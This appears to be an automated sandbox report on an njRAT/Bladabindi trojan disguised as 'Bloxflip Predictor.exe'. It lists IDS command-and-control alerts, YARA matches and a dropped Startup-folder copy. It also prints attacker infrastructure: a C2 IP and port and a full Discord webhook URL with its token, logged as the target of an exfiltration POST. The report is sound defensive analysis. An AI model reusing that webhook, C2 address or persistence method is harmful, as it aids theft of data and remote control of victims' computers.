          Source: Network trafficSuricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:49983 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.5:49983 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:49983 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:49982 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:49984 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.5:49984 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2033132 - Severity 1 - ET MALWARE Generic njRAT/Bladabindi CnC Activity (ll) : 192.168.2.5:49985 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2021176 - Severity 1 - ET MALWARE Bladabindi/njRAT CnC Command (ll) : 192.168.2.5:49985 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:49985 -> 147.185.221.224:10397
          Source: Network trafficSuricata IDS: 2825564 - Severity 1 - ETPRO MALWARE Generic njRAT/Bladabindi CnC Activity (act) : 192.168.2.5:49984 -> 147.185.221.224:10397
          Source: global trafficTCP traffic: 147.185.221.224 ports 0,1,3,7,9,10397
          Source: global trafficTCP traffic: 192.168.2.5:49726 -> 147.185.221.224:10397
          Source: global trafficHTTP traffic detected: POST /api/webhooks/1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZYDHIuWHv2Qzzn-JTgsdIp HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: discord.comContent-Length: 247Expect: 100-continueConnection: Keep-Alive
          Source: Joe Sandbox ViewIP Address: 162.159.137.232 162.159.137.232
          Source: Joe Sandbox ViewASN Name: SALSGIVERUS SALSGIVERUS
          Source: Joe Sandbox ViewJA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
          Source: unknownHTTPS traffic detected: 162.159.137.232:443 -> 192.168.2.5:49714 version: TLS 1.0
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: global trafficDNS traffic detected: DNS query: discord.com
          Source: global trafficDNS traffic detected: DNS query: quite-cs.at.ply.gg
          Source: unknownHTTP traffic detected: POST /api/webhooks/1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZYDHIuWHv2Qzzn-JTgsdIp HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: discord.comContent-Length: 247Expect: 100-continueConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 13 Dec 2024 11:31:53 GMTContent-Type: application/jsonContent-Length: 45Connection: closeCache-Control: public, max-age=3600, s-maxage=3600strict-transport-security: max-age=31536000; includeSubDomains; preloadx-ratelimit-bucket: 3d2712a9e4fe17cc9d3fed4a8e672e5fx-ratelimit-limit: 5x-ratelimit-remaining: 4x-ratelimit-reset: 1734089514x-ratelimit-reset-after: 1via: 1.1 googlealt-svc: h3=":443"; ma=86400CF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n9wbsGCU7WkE%2FAtznTqtdQcBmchAp1Y%2Ftal2agipQu6gJShuOgAt6wF1BFedC2mkbQka87vBjO1C3QQhfV%2Bt1BsgOmy2xAsUYAOt%2BfBksRAohlWjfA40K6ZBFZmr"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}X-Content-Type-Options: nosniffSet-Cookie: __cfruid=d3f28fe7b7367f135ebf22d2ac86ded1e15eb002-1734089513; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneContent-Security-Policy: frame-ancestors 'none'; default-src 'none'Set-Cookie: _cfuvid=pnFd6BJ.ITU12cb7tlltd2RqJsrP8UVkk0QdnIVrVG4-1734089513550-0.0.1.1-604800000; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8f15a160bce84387-EWR{"message": "Unknown Webhook", "code": 10015}
          Source: Bloxflip Predictor.exe, Windows.exe.2.dr, Bloxflip Predictor.exe.1.drString found in binary or memory: https://discord.com/api/webhooks/1040048109578895410/ewZ0edyfPb3PSo10z3bgM05aZex7uX3D_NzU6Fq1aA_P8lZ
          Source: Bloxflip Predictor.exe, Windows.exe.2.dr, Bloxflip Predictor.exe.1.drString found in binary or memory: https://gg.ylp.ta.sc-etiuq
          Source: unknownNetwork traffic detected: HTTP traffic on port 49714 -> 443
          Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714

          E-Banking Fraud

          barindex
          Source: Yara matchFile source: Bloxflip Predictor.exe, type: SAMPLE
          Source: Yara matchFile source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: Bloxflip Predictor.exe PID: 5504, type: MEMORYSTR
          Source: Yara matchFile source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPED
          Source: Yara matchFile source: C:\Windows\Bloxflip Predictor.exe, type: DROPPED

          System Summary

          barindex
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: Detects executables using attrib with suspicious attributes attributes Author: ditekSHen
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables using attrib with suspicious attributes attributes Author: ditekSHen
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: Detects executables using attrib with suspicious attributes attributes Author: ditekSHen
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables using attrib with suspicious attributes attributes Author: ditekSHen
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
          Source: 0000000C.00000002.2880439130.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: 0000000A.00000002.2394132880.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: Process Memory Space: Bloxflip Predictor.exe PID: 5504, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: Process Memory Space: Bloxflip Predictor.exe PID: 428, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: Process Memory Space: Bloxflip Predictor.exe PID: 7056, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: Process Memory Space: Windows.exe PID: 6364, type: MEMORYSTRMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: Detects executables using attrib with suspicious attributes attributes Author: ditekSHen
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: Windows_Trojan_Njrat_30f3c220 Author: unknown
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: Detects malware from disclosed CN malware set Author: Florian Roth
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: detect njRAT in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: Detects file containing reversed ASEP Autorun registry keys Author: ditekSHen
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: Detects executables using attrib with suspicious attributes attributes Author: ditekSHen
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: Detects NjRAT / Bladabindi Author: ditekSHen
          Source: C:\Windows\Bloxflip Predictor.exeProcess Stats: CPU usage > 49%
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeFile created: C:\Windows\Bloxflip Predictor.exeJump to behavior
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeCode function: 1_2_010203701_2_01020370
          Source: C:\Users\user\Desktop\Bloxflip Predictor.exeCode function: 1_2_010203601_2_01020360
          Source: C:\Windows\Bloxflip Predictor.exeCode function: 2_2_012D03702_2_012D0370
          Source: C:\Windows\Bloxflip Predictor.exeCode function: 2_2_012D03602_2_012D0360
          Source: C:\Windows\Bloxflip Predictor.exeCode function: 10_2_0576037010_2_05760370
          Source: C:\Windows\Bloxflip Predictor.exeCode function: 10_2_0576036010_2_05760360
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeCode function: 12_2_01A0037012_2_01A00370
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exeCode function: 12_2_01A0036012_2_01A00360
          Source: Bloxflip Predictor.exe, 00000001.00000002.2144638603.0000000000C9E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs Bloxflip Predictor.exe
          Source: Bloxflip Predictor.exe, 00000002.00000002.4504825162.00000000012FE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorwks.dllT vs Bloxflip Predictor.exe
          Source: Bloxflip Predictor.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: INDICATOR_SUSPICIOUS_EXE_attrib author = ditekSHen, description = Detects executables using attrib with suspicious attributes attributes
          Source: Bloxflip Predictor.exe, type: SAMPLEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_attrib author = ditekSHen, description = Detects executables using attrib with suspicious attributes attributes
          Source: 1.0.Bloxflip Predictor.exe.510000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_attrib author = ditekSHen, description = Detects executables using attrib with suspicious attributes attributes
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_attrib author = ditekSHen, description = Detects executables using attrib with suspicious attributes attributes
          Source: 1.2.Bloxflip Predictor.exe.2b988c4.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
          Source: 0000000C.00000002.2880439130.00000000034A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: 00000001.00000000.2042331899.0000000000512000.00000002.00000001.01000000.00000003.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: 00000001.00000002.2145141321.0000000002B71000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: 0000000A.00000002.2394132880.0000000003401000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: Process Memory Space: Bloxflip Predictor.exe PID: 5504, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: Process Memory Space: Bloxflip Predictor.exe PID: 428, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: Process Memory Space: Bloxflip Predictor.exe PID: 7056, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: Process Memory Space: Windows.exe PID: 6364, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_attrib author = ditekSHen, description = Detects executables using attrib with suspicious attributes attributes
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Windows.exe, type: DROPPEDMatched rule: MALWARE_Win_NjRAT author = ditekSHen, description = Detects NjRAT / Bladabindi
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: Windows_Trojan_Njrat_30f3c220 reference_sample = 741a0f3954499c11f9eddc8df7c31e7c59ca41f1a7005646735b8b1d53438c1b, os = windows, severity = x86, creation_date = 2021-06-13, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Njrat, fingerprint = d15e131bca6beddcaecb20fffaff1784ad8a33a25e7ce90f7450d1a362908cc4, id = 30f3c220-b8dc-45a1-bcf0-027c2f76fa63, last_modified = 2021-10-04
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: CN_disclosed_20180208_c date = 2018-02-08, hash1 = 17475d25d40c877284e73890a9dd55fccedc6a5a071c351a8c342c8ef7f9cea7, author = Florian Roth, description = Detects malware from disclosed CN malware set, reference = https://twitter.com/cyberintproject/status/961714165550342146, license = https://creativecommons.org/licenses/by-nc/4.0/
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: Njrat hash1 = d5f63213ce11798879520b0e9b0d1b68d55f7727758ec8c120e370699a41379d, author = JPCERT/CC Incident Response Group, description = detect njRAT in memory, rule_usage = memory scan
          Source: C:\Windows\Bloxflip Predictor.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_ASEP_REG_Reverse author = ditekSHen, description = Detects file containing reversed ASEP Autorun registry keys
